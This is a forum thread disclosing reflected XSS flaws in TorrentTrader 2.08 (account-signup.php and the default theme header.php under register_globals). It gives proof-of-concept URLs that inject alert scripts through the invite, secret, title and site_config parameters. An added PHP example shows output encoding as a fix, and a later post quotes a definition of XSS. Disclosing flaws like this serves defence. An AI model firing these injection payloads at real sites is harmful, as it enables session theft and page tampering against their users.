#1
11th April 2019, 02:22
BamBam0077
Reflected XSS
###############################################################################
5. Reflected XSS in "account-signup.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
http://localhost/torrenttrader208/account-signup.php?invite_row=1&invite="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/account-signup.php?invite_row=1&secret="><script>alert(String.fromCharCode(88,83,83))</script>
###############################################################################
6. Reflected XSS in "/themes/default/header.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
http://localhost/torrenttrader208/themes/default/header.php?title=</title><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[SITEURL]=--><script>alert(String.fromCharCode(88,83,83))</script>
###############################################################################
__________________
\sudo,yum/

Last edited by Thor; 14th April 2019 at 11:30. Reason: Edited Code to make it Readable
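
Added example, not part of the original post and not TorrentTrader's own code: a sketch of how the reported parameters can be read explicitly and HTML-encoded on output so the result does not depend on register_globals. The function names (h, request_param, render_invite_fields, render_header), the IN_TRACKER constant and the HTML layout are hypothetical; the sample query string is the one from the report.

```php
<?php
// Added example; all names and the markup below are hypothetical.

// HTML-encode a value for element content or a quoted attribute.
function h($value): string
{
    // Arrays (e.g. ?invite[]=x) are dropped instead of being printed.
    if (!is_scalar($value)) {
        return '';
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read a parameter from the query array explicitly, never from a global
// that register_globals may have created from the request.
function request_param(array $query, string $name): string
{
    return isset($query[$name]) && is_string($query[$name]) ? $query[$name] : '';
}

// Hidden fields as a signup form might echo them back (layout assumed).
function render_invite_fields(array $query): string
{
    $invite = request_param($query, 'invite');
    $secret = request_param($query, 'secret');
    return '<input type="hidden" name="invite" value="' . h($invite) . '">' . "\n"
         . '<input type="hidden" name="secret" value="' . h($secret) . '">' . "\n";
}

// Theme header fragment. $siteConfig and $title are passed in by the caller,
// so a direct request to the theme file cannot supply them. An include-only
// file can also refuse direct requests, for example:
//   if (!defined('IN_TRACKER')) { http_response_code(403); exit; }
function render_header(array $siteConfig, string $title): string
{
    return '<meta charset="' . h($siteConfig['CHARSET'] ?? 'utf-8') . '">' . "\n"
         . '<title>' . h($title) . '</title>' . "\n";
}

// Constructed input: the query strings from the report above.
$payload = '"><script>alert(String.fromCharCode(88,83,83))</script>';
parse_str('invite_row=1&invite=' . $payload, $query);
echo render_invite_fields($query);
echo render_header(['CHARSET' => $payload], '</title>' . $payload);
```

Run with the PHP CLI; the payload comes back as inert text (`&quot;&gt;&lt;script&gt;...`) in both the attribute and the title context.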
#2
13th April 2019, 05:19
MicroMonkey
what is that?

Last edited by MicroMonkey; 13th April 2019 at 13:47.
#3
21st October 2019, 19:53
BamBam0077
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007.[1] In 2017, XSS was still considered a major threat vector.[2] XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.

https://en.m.wikipedia.org/wiki/Cross-site_scripting
__________________
\sudo,yum/